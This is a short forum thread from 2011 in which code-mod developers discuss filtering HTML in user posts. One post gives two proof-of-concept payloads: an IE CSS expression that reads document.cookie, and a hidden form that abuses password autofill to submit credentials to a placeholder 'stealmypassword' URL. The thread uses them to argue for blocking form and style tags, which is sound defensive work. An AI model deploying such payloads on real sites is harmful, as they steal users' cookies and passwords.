|
|
Post by Wormopolis on Mar 14, 2011 18:32:27 GMT -8
heh heh "Barack Obama 08"!
|
|
Bones
Code Helper 
Posts: 131
Bones said 0 great things
|
Post by Bones on Mar 28, 2011 20:23:34 GMT -8
[dohtml]IE CSS exploit:<br><br>
<[style]>.windowbg {background: url("expression:alert(document.cookie)");}<[/style]>[/dohtml]
[dohtml]Firefox password manager auto-fill-in exploit:<br><br>
<div align="left"><form action="http:myserver.com/?stealmypassword">
<div style="opacity:0.5">name(hidden)<input name="username" type="text" value="" >
password(hidden)<input name="pass" type="password" value="" ></div><br><br>
color(visible)<input type="text" value="enter your favorite color" size="25">
<br><br><input type="submit" value="Click here to send password to some unknown site" title="http:myserver.com/?stealmypassword">
</form></div>[/dohtml]
|
|
|
|
Post by Wormopolis on Mar 29, 2011 6:50:57 GMT -8
I think form is a tag that should be treated just like script.
|
|
Bones
Code Helper
Posts: 131
Bones said 0 great things
|
Post by Bones on Mar 29, 2011 15:43:14 GMT -8
I think form is a tag that should be treated just like script. agreed, the way I handled HTML security in the AVIP code was to sanitize against a list of allowed tags and attributes but that is a tad restrictive for a code geared toward appearance unlike AVIP which was simply concerned with functionality. I'll disallow <form> but <input/select/option> can stay. Style tags will also get the cut since they too provide an attack surface (IE expressions) as well as a way to screw with the entire forum's appearance when viewing that thread. Think I should include RTSP protocol in addition to HTTP(S) and FTP |
|